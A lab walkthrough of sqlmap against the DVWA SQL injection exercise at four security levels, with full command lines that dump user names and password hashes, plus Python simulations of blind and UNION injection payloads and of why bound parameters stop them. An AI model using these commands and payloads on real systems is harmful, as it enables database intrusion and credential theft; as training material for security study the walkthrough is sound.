Table of contents
1. Sqlmap
1. Introduction
Sqlmap is an automated SQL injection tool: given a URL or a captured request, it detects SQL injection flaws in the parameters, identifies the back-end DBMS and exploits the flaw to enumerate and dump data. The databases supported include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB (current releases support more; sqlmap -hh lists them).
Five injection techniques are employed (selected with --technique, using the letters below; recent releases add a sixth, inline queries, Q):
- Boolean-based blind (B): the injected condition changes whether the page shows its normal content, so true/false can be read from the response even though no data is echoed directly.
- Time-based blind (T): the page content gives nothing away, so the injected condition is coupled to a delay statement and the verdict is read from whether the response time increases.
- Error-based (E): the DBMS error message is echoed into the page, and the result of an injected sub-expression is smuggled out inside that error text.
- UNION query-based (U): a UNION SELECT appends attacker-chosen rows to the original result set, which works when the page reflects the query results and the column count can be matched.
- Stacked queries (S): a second statement separated by ; is appended to the original one, so several statements execute in one request when the driver allows it.
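To make the first and fourth techniques concrete, here is an added example (not code from the page or from the sqlmap project) that rebuilds the DVWA low-level lookup over an in-memory SQLite table and runs two of the techniques against it by hand: a boolean-based blind oracle that recovers a value one character at a time, the way sqlmap does, and a UNION query that pulls the whole table in one request. The users table, its rows and the helper names are constructed for the example; the string functions are SQLite's (unicode(), substr()), where sqlmap would emit ORD(MID(...)) against MySQL. Time-based and error-based injection are not simulated, since SQLite has no sleep function and does not echo values in errors.

```python
import sqlite3

# Constructed sample data modelled on DVWA's users table (assumption, not the page's own data).
SAMPLE_USERS = [
    (1, "admin", "Admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "Gordon", "e99a18c428cb38d5f260853678922e03"),
]


class VulnerableApp:
    """Stand-in for DVWA's low-level handler: the id is pasted into a quoted SQL literal.
    Backed by in-memory SQLite, so SQL functions use SQLite names (MySQL: ORD(MID(...)))."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, password TEXT)")
        self.db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
        self.requests = 0  # counts "HTTP requests" so the cost of each technique is visible

    def page(self, user_input):
        """Return the first_name values the page would render; an SQL error renders nothing."""
        self.requests += 1
        sql = f"SELECT first_name FROM users WHERE user_id = '{user_input}'"
        try:
            return [row[0] for row in self.db.execute(sql)]
        except sqlite3.Error:
            return []


def is_true(app, condition):
    """Boolean-based blind oracle: the row for id 1 is shown only if `condition` holds.
    The trailing comment swallows the closing quote the application appends."""
    return len(app.page(f"1' AND ({condition}) -- ")) > 0


def blind_extract(app, subquery, max_len=64):
    """Recover the scalar result of `subquery` one character per position, as sqlmap's
    boolean-based technique does: binary search over the character's code point."""
    result = ""
    for pos in range(1, max_len + 1):
        if not is_true(app, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127  # search space for one ASCII character, narrowed by 7 oracle calls
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(app, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def union_extract(app):
    """UNION query-based: with the column count matched, one request returns the whole
    table inline in the page instead of one bit of information per request."""
    return app.page("1' UNION SELECT user || ':' || password FROM users -- ")


if __name__ == "__main__":
    app = VulnerableApp()
    secret = blind_extract(app, "SELECT password FROM users WHERE user_id = 1")
    print(f"blind: {secret} ({app.requests} requests)")
    app.requests = 0
    print(f"union: {union_extract(app)} ({app.requests} request)")
```

Run it and compare the request counters: the blind extraction of a 32-character hash costs a few hundred requests, the UNION query costs one, which is why sqlmap prefers UNION or error-based techniques whenever the page reflects data and falls back to blind techniques only when it must.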
2. Basic steps
View sqlmap's options; the command format is: sqlmap -h (sqlmap -hh prints the full list)
Pick a target and let sqlmap test the parameters and identify the DBMS; the command format is: sqlmap -u "target URL"
Once the DBMS has been identified (MySQL in this walkthrough), list the databases; the command format is: sqlmap -u "target URL" --dbs
List the tables in a database; the command format is: sqlmap -u "target URL" --tables -D database_name
List the columns of a table; the command format is: sqlmap -u "target URL" --columns -T table_name -D database_name
Dump the contents of the chosen columns; the command format is: sqlmap -u "target URL" --dump -C column_name -T table_name -D database_name
A few things to know before starting
sqlmap needs parameters, the most important of which is the target of the injection test. First check whether the target requires a login. If it does, pass the logged-in session cookie to sqlmap; otherwise every request is redirected to the login page and sqlmap never reaches the vulnerable code.
python sqlmap.py -u "target address" --cookie="cookie value" --batch
--batch runs non-interactively, taking the default answer to every prompt; without it each step asks for confirmation. Review those defaults before relying on it in a real engagement.
--current-db prints the name of the database the application is connected to
-D DB specifies the DBMS database to enumerate
-T TBL specifies the DBMS table to enumerate
-C COL specifies the DBMS column(s) to enumerate
-X EXCLUDECOL specifies the DBMS column(s) to leave out of the enumeration
-U USER specifies the DBMS user to enumerate
3. Commands
The canonical spelling of the long options is with two dashes (--dbs, --tables); sqlmap tolerates the single-dash form, but the commands below use the documented one.
sqlmap.py -u "http://xxx//" --batch
sqlmap.py -u "http://xxx//" --cookie="<captured cookie>"
# enumerate the databases
sqlmap.py -u "http://xxx//" --cookie="<captured cookie>" --dbs
# list the tables of the dvwa database
sqlmap.py -u "http://xxx//" --cookie="<captured cookie>" -D data --tables
# list the column names in the table
sqlmap.py -u "http://xxx//" --cookie="<captured cookie>" -D data -T users --columns
# dump the contents of the chosen columns
sqlmap.py -u "http://xxx//" --cookie="<captured cookie>" -D data -T users -C user,password --dump
2. SQL Injection
1. Low
Submit id=1 in the form to obtain the request URL; at this level the parameter travels in the query string.
Run sqlmap against that URL to test the parameter:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --batch
sqlmap reports that the page requires a login, so copy the cookies from the browser session: PHPSESSID carries the session and the security cookie selects the DVWA level, so both must be passed.
List the databases:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch --dbs
List the tables of the dvwa database:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa --tables
List the column names of the users table:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users --columns
Dump the user and password columns:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users -C user,password --dump
The user names and password hashes from the users table are now dumped; sqlmap offers to crack the hashes with its built-in wordlist, and --batch accepts that offer by default.
2. Medium
Submit id=1 again: this time the id no longer appears in the URL.
Capture the request with Burp Suite and inspect the submitted data.
The form now uses POST, so the parameters are passed to sqlmap with --data. The level is still injectable: the value is run through an escaping function, but the query uses it unquoted in numeric context, so a payload that contains no quote characters is unchanged by the escaping.
Test the parameter:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch
List the databases:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch --dbs
List the tables of the dvwa database:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa --tables
List the column names:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users --columns
Dump the chosen columns:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users -C user,password --dump
3. High
At this level, submitting the id redirects to another page: the input form (session-input.php) only stores the id in the session, and the query runs when the main sqli page is loaded afterwards. Using sqlmap here needs one more concept, second-order injection: the injected input is sent to one page, but the result that tells us whether the condition was true or false appears on a different page, so sqlmap has to be told which page to fetch and inspect after each injected request.
That page is given with --second-url followed by its URL (older sqlmap releases named the option --second-order).
Capture the submission with Burp Suite, because neither the POST target nor the parameters can be read from the URL bar.
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch
The rest proceeds exactly as at the low and medium levels.
Dump the data:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password --dump
4. Impossible
This level adds an anti-CSRF token (user_token) to every request; capture a request with Burp Suite to obtain it.
Run sqlmap against the captured request. Read the outcome with the level's source in mind: the impossible level validates user_token and regenerates it on every page load, so a token pasted into the command line is stale after the first request (sqlmap can refresh it per request with --csrf-token=user_token), and the query itself is a prepared statement with the id bound as an integer, which leaves no injection point. The expected result is therefore that sqlmap reports the parameter as not injectable, and a dump that appears to work should be checked against the security cookie actually in effect.
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=f237dc0df1d6cdf589f09179a99fa7aa#" --cookie="security=impossible;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --batch
Attempt to dump the data:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=581a16aa4511d8c46a3ea1834973122a#" --cookie="security=impossible;PHPSESSID=0mcqc7ludqslr2se50lsaas3g0" --batch -D dvwa -T users -C user,password --dump
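The four levels differ only in how the id reaches the query, and that decides which of sqlmap's boolean probes can separate a true from a false response. The following added example (not code from the page, from DVWA or from sqlmap) models each level's handler over an in-memory SQLite table and runs the first check sqlmap performs, a true/false pair in numeric and in quoted context, to show where each level is injectable and why the impossible level is not. The table, its rows, the escape() stand-in for mysqli_real_escape_string() and the function names are constructed for the example; the high-level handler collapses the two DVWA requests (session-input.php, then the index page) into one function for brevity.

```python
import sqlite3

# Constructed sample data modelled on DVWA's users table (assumption, not the page's own data).
SAMPLE_USERS = [
    (1, "admin", "Admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "Gordon", "e99a18c428cb38d5f260853678922e03"),
]


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return db


def run(db, sql, params=()):
    """Execute and return the first_name values the page would render; an SQL error renders nothing."""
    try:
        return [row[0] for row in db.execute(sql, params)]
    except sqlite3.Error:
        return []


def low(db, user_id):
    """Low: the GET id is concatenated into a quoted literal of the same page's query."""
    return run(db, f"SELECT first_name FROM users WHERE user_id = '{user_id}'")


def escape(value):
    """Stand-in for mysqli_real_escape_string(): backslash-escapes quotes and backslashes."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def medium(db, user_id):
    """Medium: the POST id is escaped but interpolated unquoted, so a payload without
    quote characters (numeric context) passes through the escaping unchanged."""
    return run(db, f"SELECT first_name FROM users WHERE user_id = {escape(user_id)}")


def high(db, user_id):
    """High: session-input.php only stores the id; the query runs when the index page is
    loaded next, which is why sqlmap needs --second-url to read the result."""
    session = {}
    session["id"] = user_id  # request 1: session-input.php stores the value
    stored = session["id"]  # request 2: the index page reads it back into a quoted literal
    return run(db, f"SELECT first_name FROM users WHERE user_id = '{stored}' LIMIT 1")


def impossible(db, user_id):
    """Impossible: numeric type check plus a bound integer parameter; the input is data, never SQL."""
    if not user_id.isdigit():
        return []
    return run(db, "SELECT first_name FROM users WHERE user_id = ? LIMIT 1", (int(user_id),))


# Boolean pairs in the two injection contexts sqlmap tries first. A context is injectable
# when the 'true' member reproduces the baseline page and the 'false' member changes it.
PROBES = {
    "numeric": ("1 AND 1=1", "1 AND 1=2"),
    "quoted": ("1' AND '1'='1", "1' AND '1'='2"),
}


def injectable(handler, db):
    """Return the name of the context in which the boolean pair separates, or None."""
    baseline = handler(db, "1")
    for context, (true_payload, false_payload) in PROBES.items():
        if handler(db, true_payload) == baseline and handler(db, false_payload) != baseline:
            return context
    return None


if __name__ == "__main__":
    db = build_db()
    for handler in (low, medium, high, impossible):
        print(f"{handler.__name__:10s} -> {injectable(handler, db)}")
```

The low and high handlers separate in quoted context, medium only in numeric context (its quoted probe becomes a syntax error after escaping, which is why escaping alone is not a fix), and impossible in neither: once the value is bound as a parameter there is no SQL for the probe to alter, so no amount of token handling would turn it into an injection point.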